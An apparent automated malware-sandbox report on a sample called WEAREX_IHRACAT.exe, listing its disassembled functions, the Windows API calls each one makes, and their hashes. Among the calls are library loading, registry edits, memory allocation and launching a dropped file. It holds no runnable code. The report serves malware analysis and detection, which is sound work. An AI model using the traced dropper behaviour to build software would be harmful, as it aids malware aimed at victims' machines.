                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                          • Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
                          • Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                          • Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44
                          Function 00401F98 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                            • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                            • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                            • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                            • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                            • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                            • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                            • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                          • String ID:
                          • API String ID: 334405425-0
                          • Opcode ID: 580077ccb1ff2a490d41d938ec1f3e7129ee5ad0d62a559f02f0fa6a839ffa7c
                          • Instruction ID: 49947657582026fbe4aef0e17b19bc3bf563a4cedc03dc09487ed5c70e3121f8
                          • Opcode Fuzzy Hash: 580077ccb1ff2a490d41d938ec1f3e7129ee5ad0d62a559f02f0fa6a839ffa7c
                          • Instruction Fuzzy Hash: B521C871904215F6CF206F95CE48A9E7AB0AB09354F70427BF610B51E0D7B94D41DA6E
                          Function 00402452 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000016D,00000000,00000022,00000000,?,?), ref: 00402C6A
                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Enum$CloseOpenValue
                          • String ID:
                          • API String ID: 167947723-0
                          • Opcode ID: 00823af30153f19d1c00257d08f7837de8e40deeac5670c34b227309e645baf3
                          • Instruction ID: 196cef28da363d1279e483bf9a38a563a29f189f24dbcf66659da751fa440e39
                          • Opcode Fuzzy Hash: 00823af30153f19d1c00257d08f7837de8e40deeac5670c34b227309e645baf3
                          • Instruction Fuzzy Hash: 87F0D1B1A04205ABE7108F65DE88ABF766CEF40358F60443EF405B21C0D6B85D419B6A
                          Function 00401DF3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\gangningerne\jot\mtn\Discomplexion,?), ref: 00401E3D
                          Strings
                          • C:\Users\user\gangningerne\jot\mtn\Discomplexion, xrefs: 00401E26
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: ExecuteShell
                          • String ID: C:\Users\user\gangningerne\jot\mtn\Discomplexion
                          • API String ID: 587946157-462110826
                          • Opcode ID: ce694bb9da72e087ba61a13a25ec697da31c5eed5f00b2d5c9ac6c29772317e6
                          • Instruction ID: 3f653c9cfcf7a787dcf128efd04e0ef48ce3664fdda10e2cbb7d118b60988be6
                          • Opcode Fuzzy Hash: ce694bb9da72e087ba61a13a25ec697da31c5eed5f00b2d5c9ac6c29772317e6
                          • Instruction Fuzzy Hash: 5EF0F675B54200ABDB006FB5DD4AE9E33B8AB24715F600937F401F70D1D6FC88419629
                          Function 10002870 Relevance: 3.2, APIs: 2, Instructions: 156memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNELBASE(00000000), ref: 1000292F
                          • GetLastError.KERNEL32 ref: 10002A36
                          Memory Dump Source
                          • Source File: 00000000.00000002.2459321793.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.2459293214.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000000.00000002.2459349894.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000000.00000002.2459378881.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: AllocErrorLastVirtual
                          • String ID:
                          • API String ID: 497505419-0
                          • Opcode ID: 25ba90756ec787877d4bf69bcc9f708461c4247993a7c98eb6ee1d719eb9b926
                          • Instruction ID: 1e4ae0ab9f7d80da0c6c18ef4be67b5a8e29914e0a0cef2da75b429278759b76
                          • Opcode Fuzzy Hash: 25ba90756ec787877d4bf69bcc9f708461c4247993a7c98eb6ee1d719eb9b926
                          • Instruction Fuzzy Hash: C651A4BA805214DFFB10EF64DCC2B5937A4EB443D4F22842AEA04D722DCF34A994CB95
                          Function 004023DE Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000016D,00000000,00000022,00000000,?,?), ref: 00402C6A
                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID:
                          • API String ID: 3677997916-0
                          • Opcode ID: a3f576b14e9880af47cd5831c052fde71057405287977fe3c049f32c7035e6ad
                          • Instruction ID: 6c75ae994a47700371a60e183d9c6493363f31bd6906e7075ff81e32be465fed
                          • Opcode Fuzzy Hash: a3f576b14e9880af47cd5831c052fde71057405287977fe3c049f32c7035e6ad
                          • Instruction Fuzzy Hash: 6E11A071914205EEDB14CFA1DA585AFB7B4EF04358F60843FE042B72D0D6B85A41DB2A
                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                          Download Yara Rule
                          APIs
                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                          • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                          • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                          • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                          Function 004022D3 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000016D,00000000,00000022,00000000,?,?), ref: 00402C6A
                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
                          • RegCloseKey.ADVAPI32(00000000), ref: 004022FB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CloseDeleteOpenValue
                          • String ID:
                          • API String ID: 849931509-0
                          • Opcode ID: 8efb8f1ccdf8de01b94487a7fdd09090c83cb191401bf8795a383c5026381edf
                          • Instruction ID: 6cfe575b1e931931ae6cf9a5ddb5ae5b21c85a020fc8f89310b59cc06b76a7bd
                          • Opcode Fuzzy Hash: 8efb8f1ccdf8de01b94487a7fdd09090c83cb191401bf8795a383c5026381edf
                          • Instruction Fuzzy Hash: E4F0AF72A04210ABEB01AFA18A8EAAE73689B14314F60043BF501B71C0C9BC5D02862A
                          Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                          • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Window$EnableShow
                          • String ID:
                          • API String ID: 1136574915-0
                          • Opcode ID: b643271b868b9a40f851d1ef19f11c0424dbe1118e1d4d70f38c684e3c8424a9
                          • Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
                          • Opcode Fuzzy Hash: b643271b868b9a40f851d1ef19f11c0424dbe1118e1d4d70f38c684e3c8424a9
                          • Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E
                          Function 00405B54 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,80000000,00000003), ref: 00405B58
                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                          • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                          • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                          • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                          Function 004026F7 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402711
                            • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: FilePointerwsprintf
                          • String ID:
                          • API String ID: 327478801-0
                          • Opcode ID: 98ccbb7068feabc3c0ae90a56470a6d5818c3af9d2cd9401b954f1a0f04dcc0c
                          • Instruction ID: e22c1b7e3cb1808aafcc1ab2efb5fc6ea69776b3c427c7ac8c77fd4a8c9c6d31
                          • Opcode Fuzzy Hash: 98ccbb7068feabc3c0ae90a56470a6d5818c3af9d2cd9401b954f1a0f04dcc0c
                          • Instruction Fuzzy Hash: D8E01AB2B14114AADB01AFA5AD4ACAEB678EB05319F60083BF101B00D1C67959019A7E
                          Function 00402251 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                          Download Yara Rule
                          APIs
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: PrivateProfileStringWrite
                          • String ID:
                          • API String ID: 390214022-0
                          • Opcode ID: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
                          • Instruction ID: fec69ff260b0ac9ecd577f12e686b41ce403e552977328a8d437569390afa8be
                          • Opcode Fuzzy Hash: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
                          • Instruction Fuzzy Hash: 22E086329041246ADB103EF20E8DD7F32785B45714B54023FB511BA2C2D5FC1D42476E
                          Function 00402C42 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.KERNELBASE(00000000,0000016D,00000000,00000022,00000000,?,?), ref: 00402C6A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                          • Instruction ID: e3df8b11752b843856ad965a2913e8001498b25c252565f1a48e325e263545e5
                          • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                          • Instruction Fuzzy Hash: 88E04F76280108BADB00DFA4ED46E9577ECEB14701F004425B608D6091C674E5008768
                          Function 00405BD7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                          Download Yara Rule
                          APIs
                          • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                          • Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
                          • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                          • Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9
                          Function 10002796 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
